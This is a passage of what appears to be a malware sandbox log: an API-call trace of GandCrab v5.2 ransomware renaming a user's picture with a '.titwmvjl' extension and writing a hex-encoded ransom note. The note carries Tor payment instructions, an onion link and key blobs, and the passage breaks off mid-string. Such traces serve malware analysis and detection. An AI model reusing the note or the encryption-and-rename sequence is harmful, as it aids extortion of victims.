lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x59f5, lpOverlapped=0x0) returned 1 [0093.974] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.974] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0093.977] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.981] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.981] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.981] CloseHandle (hObject=0x2ac) returned 1 [0093.982] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\HqptcqKhb rKrn.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\hqptcqkhb rkrn.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\HqptcqKhb rKrn.png.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\hqptcqkhb rkrn.png.titwmvjl"), dwFlags=0x1) returned 1 [0093.982] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.983] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.983] lstrcmpW (lpString1="Saved Pictures", lpString2=".") returned 1 [0093.983] lstrcmpW (lpString1="Saved Pictures", lpString2="..") returned 1 [0093.983] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="Saved Pictures" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures" [0093.983] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\" [0093.983] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0093.983] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.983] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0093.983] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.983] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0093.983] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.984] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0093.984] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.984] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0093.984] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.984] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.984] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\\\TITWMVJL-DECRYPT.txt") returned 67 [0093.984] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Saved Pictures\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\saved pictures\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0093.985] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x